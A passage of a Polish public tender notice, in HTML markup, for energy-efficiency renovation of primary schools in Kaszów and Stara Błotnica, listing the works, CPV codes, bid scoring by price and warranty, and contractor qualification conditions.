ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Poprawa efektywności energetycznej w budynku publicznej szkoły podstawowej w miejscowości Kaszów działka nr ewid. 38 .W ramach zadania przewiduje się wyprawę tynkarską:Wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie Kolorystykę elewacji przedstawiono w części rysunkowej.Zakres prac budowlanych wykonywanych na podstawie niniejszej dokumentacji obejmuje:– prace wstępne, zabezpieczające i przygotowawcze;– remont stropodachu nad kotłownią; po demontażu starych warstw stropodachu: papy i izolacji należy wyrównać strop warstwą zaprawy podkładowej. Po całkowitym wyschnięciu podłoże należy pomalować lepikiem i przykleić papę podkładową. Izolację stropodachu wykonać ze styropianu EPS≤032, gr. 10cm, pokrycie z papy termozgrzewalnej,–wymiana drewnianej stolarki okiennej na PCV, kolor biały, współczynnik przenikania ciepła U ≤ 1,1 [W/(m2*K)];–wymiana stolarki drzwiowej na stalowe antywłamaniowe (drzwi do domu nauczyciela oraz boczne na elewacji północnej, kolor ciemny brąz, współczynnik przenikania ciepła U ≤ 1,5 [W/(m2*K)];– gruntowanie podłoża;–docieplenie ścian zewnętrznych budynku - styropianem EPS≤032 gr. 6cm, wraz z wykonaniem elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie, ściany należy ocieplić min. 30cm poniżej wieńca stropu parteru;–wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie;–wykonanie tynku mozaikowego na cokole;– remont kominów i czap kominowych; –skucie okładziny cokołu z płytek klinkierowych wraz z wyrównaniem podłoża i wykonaniem tynku mozaikowego;– wymiana rynien i rur spustowych, obróbek przy rynnach dachowych; – wymiana obróbek blacharskich daszków nad wejściem, obróbki attyk;– wymiana wszystkich parapetów zewnętrznych na z blachy stalowej powlekanej;– wymiana parapetów wewnętrznych;– wymianę kratek wentylacyjnych - na stalowe zabezpieczone antykorozyjnie;– skucie odspojonego tynku wraz z wyrównaniem podłoża;– skucie okładziny na schodach zewnętrznych i murkach przy schodach z terakoty wraz z wyrównaniem podłoża, położenie nowej okładziny;– czyszczenie i malowanie krat zewnętrznych okien;– czyszczenie i malowanie murków przy schodach zewnętrznych wejściowych;– czyszczenie i malowanie drzwi wejściowych do kotłowni;– czyszczenie i malowanie konstrukcji nośnej zadaszenia nad wejściem głównym, wykonanie nowego pokrycia z blachodachówki;– wymiana zwodów pionowych instalacji odgromowej;– wymiana zewnętrznych opraw oświetleniowych; –demontaż i montaż tablic z nr budynku i nazwą szkoły;– montaż napisu ,,3D’’ z nazwą szkoły oraz herbu na elewacji;– pozostałe prace budowlane i remontowe;Roboty budowlane rozbiórkowe i wyburzeniowe, obejmować będą:a)	demontaż istniejących warstw stropodachu tj. papy i izolacji;b)	demontaż istniejących obróbek blacharskich attyki;c)	demontaż pokrycia dachowego na zadaszeniu przy wejściu głównym;d)	demontaż rynien i rur spustowych;e)	demontaż instalacji odgromowej;f)	demontaż obróbek blacharskich;g)	demontaż kratek wentylacyjnych;h)	demontaż drewnianej stolarki okiennej i drzwiowej;i)	rozebranie parapetów wewnętrznych;j)	demontaż parapetów zewnętrznych i wewnętrznych;k)	skucie okładzin schodów zewnętrznych;l)	skucie okładzin cokołów z płytek klinkierowych;m)	skucie odspojonego tynku na elewacji zewnętrznej budynku;n)	oczyszczenie rys i spękań w konstrukcji ścian zewnętrznych;o)	pozostałe roboty rozbiórkowe i towarzyszące;Roboty budowlane przygotowawcze, obejmować będą:a)	wyrównanie stropu nad kotłownią warstwą zaprawy podkładowej;b)	hydro- i termoizolacja oraz pokrycie stropodachu nad kotłownią; c)	naprawa rys i spękań konstrukcji budynku;d)	gruntowanie preparatami gruntującymi;e)	opalenie farby z elementów metalowych (balustrady, itp.);f)	pozostałe roboty przygotowawcze;Roboty budowlane i wykończeniowe, obejmować będą:a)	montaż stolarki okiennej i drzwiowej z PCV;b)	montaż parapetów wewnętrznych z konglomeratów kamiennych;c)	wykonanie zewnętrznej wyprawy elewacyjną tynkiem silikatowo-silikonowym barwionym w masie;d)	pokrycie zadaszenia nad wejściem blachodachówką oraz malowanie konstrukcji nośnej;e)	remont murków przy schodach wejściowych z malowaniem (zeskrobanie starej farby, przeszpachlowanie nierówności, malowanie);f)	montaż rynien i rur spustowych;g)	montaż nowych obróbek blacharskich z blachy stalowej powlekanej;h)	montaż instalacji odgromowej;i)	montaż napisu ,,3D’’ z nazwą szkoły oraz herbu na elewacji;j)	pozostałe roboty budowlane i wykończeniowe;Montaż instalacji fotowoltaicznej o mocy 10.800 kWp i wymiana oświetlenia na energooszczędne typu LED.Szczegółowy opis przedmiotu zamówienia stanowią projekty budowlano wykonawcze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Poprawa efektywności w budynku publicznej szkoły podstawowej im. Ojca Świętego Jana Pawła II w Starej Błotnicy działka nr ewid. 137/2W ramach zadania przewiduje się wyprawę tynkarską:Docieplenie ścian zewnętrznych budynku Sali gimnastycznej - styropianem EPS 032 gr. 12 cm, wraz z wykonaniem elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie , ściany należy ocieplić min. 30 cm poniżej wieńca stropu parteru;Wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie Kolorystykę elewacji przedstawiono w części rysunkowej.Zakres prac budowlanych wykonywanych na podstawie niniejszej dokumentacji obejmuje:– prace wstępne, zabezpieczające i przygotowawcze;– gruntowanie podłoża;– likwidacja płyty nad schodami i schodów na elewacji północnej, wypełnienie pozostałej wnęki styropianem;– demontaż pozostałości izolacji termicznej na południowej ścianie sali gimnastycznej;–wymiana drewnianej stolarki okiennej na PCV, kolor biały, współczynnik przenikania ciepła U ≤ 1,1 [W/(m2*K)];–wymiana stolarki drzwiowej na stalową i aluminiową, antywłamaniową zgodnie z rys. A7, kolor ciemny brąz, współczynnik przenikania ciepła U ≤ 1,5 [W/(m2*K)];–wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie–docieplenie południowej ściany zewnętrznej budynku sali gimnastycznej- styropianem EPS≤032 gr.15cm, wraz z wykonaniem elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie, ściany należy ocieplić min.30cm poniżej wieńca stropu parteru;–wykonanie elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie;– czyszczenie i naprawa tynku na cokołach wraz z wykonaniem elewacji tynkiem mozaikowym 2mm barwionym w masie;– czyszczenie i naprawa tynku powyżej gzymsu wraz z wykonaniem elewacji tynkiem silikatowo-silikonowym 2mm barwionym w masie;– skucie odspojonego tynku wraz z wyrównaniem podłoża na schodach zewnętrznych elewacja południowa (sala gimnastyczna) oraz na schodach zewnętrznych do części podpiwniczonej (elewacja południowa i wschodnia);– wymiana obróbek blacharskich na wiatrołapie, płyt nad wejściem, na cokołach, attykach;– wymiana rynien i rur spustowych wraz z obróbkami;– wymiana wszystkich parapetów zewnętrznych na z blachy stalowej powlekanej;–wymiana parapetów wewnętrznych przy oknach przeznaczonych do wymiany;– wymianę kratek wentylacyjnych na stalowe zabezpieczone antykorozyjnie;– czyszczenie i malowanie balustrad stalowych przy schodach zewnętrznych; – czyszczenie i malowanie krat zewnętrznych okien;– wymiana zwodów pionowych instalacji odgromowej;– wymiana zewnętrznych opraw oświetleniowych;– skucie odspojonego tynku wraz z wyrównaniem podłoża;– demontaż i montaż tablic z nr budynku i nazwą szkoły;– montaż napisu z nazwą szkoły ,,3D’’ i herbu gminy;– pozostałe prace budowlane i remontowe;Roboty budowlane rozbiórkowe i wyburzeniowe, obejmować będą:p)	demontaż istniejących obróbek blacharskich attyki;q)	demontaż instalacji odgromowej;r)	demontaż obróbek blacharskich;s)	demontaż kratek wentylacyjnych;t)	demontaż pozostałości izolacji termicznej na południowej ścianie sali gimnastycznej;u)	demontaż drewnianej stolarki okiennej i drzwiowej;v)	demontaż parapetów zewnętrznych i wewnętrznych przy istniejących oknach drewnianych;w)	demontaż balustrad przy schodach zewnętrznych przeznaczonych do wymiany;x)	skucie odspojonego tynku na elewacji zewnętrznej budynku;y)	oczyszczenie rys i spękań w konstrukcji ścian zewnętrznych;z)	pozostałe roboty rozbiórkowe i towarzyszące;Roboty budowlane przygotowawcze, obejmować będą:g)	naprawa rys i spękań konstrukcji budynku;h)	gruntowanie preparatami gruntującymi;i)	opalenie farby z elementów metalowych (balustrady);j)	pozostałe roboty przygotowawcze;Roboty budowlane i wykończeniowe, obejmować będą:k)	montaż stolarki okiennej i drzwiowej wraz z obróbką obsadzenia; l)	montaż parapetów wewnętrznych z konglomeratów kamiennych;m)	wykonanie zewnętrznej wyprawy elewacyjną tynkiem silikatowo-silikonowym barwionym w masie wraz z dociepleniem ościeży;n)	wykonanie zewnętrznej wyprawy elewacyjnej na cokołach tynkiem silikatowo-silikonowym barwionym w masie;o)	wymiana kratek wentylacyjnych na metalowe;p)	okładzina schodów zewnętrznych; q)	malowanie balustrad przy schodach zewnętrznych;r)	montaż nowych obróbek blacharskich z blachy stalowej powlekanej;s)	montaż rynien i rur spustowych;t)	montaż nowych balustrad przy schodach zewnętrznych;u)	montaż instalacji odgromowej;v)	montaż napisu ,3D’’ z nazwą szkoły oraz herbu gminy;w)	pozostałe roboty budowlane i wykończeniowe;Montaż instalacji fotowoltaicznych o mocy 27,36kWp i wymiana oświetlenia na energooszczędne typu LED. Szczegółowy opis przedmiotu zamówienia stanowią projekty budowlano wykonawcze . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami i ich wagami (w każdej z dwóch części): L.p. Kryterium Znaczenie procentowe kryterium Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium 1. Cena oferty (C) 60% 60 2. Gwarancja (G) 40% 40 Cena ofert (C) W ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku zgodnie z przybliżeniem dziesiętnym ilość punktów wynikającą z działania: Oferta z najniższą ceną ------------------------------------- x 60 pkt. Cena oferty badanej Przez „cenę” należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r., poz. 178) Wydłużenie okresu gwarancji (G) W przypadku kryterium "wydłużenie okresu gwarancji" do oceny będzie brana pod uwagę gwarancja zadeklarowana przez wykonawcę w Formularzu ofertowym - Załącznik nr 3 do SWZ. Każdy z wykonawców zobowiązany jest do udzielenia minimum 48 miesięcy gwarancji. Zamawiający przyzna punkty za wydłużenie okresu gwarancji w następujący sposób: G = 10, jeżeli wykonawca zaoferuje 48 miesięcy gwarancji (termin minimalny wymagany), G = 20, jeżeli wykonawca zaoferuje 60 miesięcy gwarancji, G = 40, jeżeli wykonawca zaoferuje 72 miesięcy gwarancji. Niewpisanie żadnego okresu gwarancji spowoduje uznanie, że okres gwarancji będzie zgodny z wymaganiami określonymi w SWZ (48 miesięcy). W celu ostatecznego wyboru najkorzystniejszej oferty złożonej na wykonanie zamówienia w powiązaniu z przedstawionymi wyżej kryteriami zamawiający posłuży się następującym wzorem: PO = C + G gdzie: PO – liczba punktów przyznanych ofercie C – liczba punktów w kryterium „cena oferty” G – liczba punktów w kryterium „gwarancja” <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia (bez względu na liczbę części na które zostanie złożona oferta), wykaże że: a)	dysponuje lub będzie dysponował i skieruje do realizacji zamówienia: -	co najmniej 1 osobę w roli kierownika budowy - posiadająca uprawnienia bez ograniczeń w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej specjalności (bez względu na liczbę części na które zostanie złożona oferta). -	co najmniej 1 osobę – w roli kierownika robót – posiadającą wykształcenie wyższe i uprawnienia do sprawowania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym upoważniają uprawnienia budowlane w tej specjalności. UWAGA: W przypadku Wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do zdobytych w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane. UWAGA: Zgodnie z art. 12 ust. 7 ustawy Prawo budowlane, podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis, w drodze decyzji, do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3 lit. a ustawy Prawo budowlane oraz – zgodnie z odrębnymi przepisami wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności. UWAGA: Zamawiający dopuszcza możliwość łączenia funkcji, w przypadku osób, które posiadają uprawnienia w więcej niż jednej specjalności w obszarze kierowania budową / robotami. 2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o złożone dokumenty i oświadczenia. 3.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot trzeci, na potencjał, którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz 109 ust.1 pkt 4) ustawy Pzp <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.	Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: 1)	od wykonawcy, który powołuje się na zasoby podmiotów trzecich, przedstawienia, w odniesieniu do tych podmiotów, podmiotowych środków dowodowych określonych w ust. 6 pkt 1) powyżej oraz spełnienia - w zakresie, w jakim wykonawca powołuje się na jego zasoby - warunki udziału w postępowaniu – jeżeli wykonawca polega na zasobach podmiotu trzeciego. 2)	Wykaz 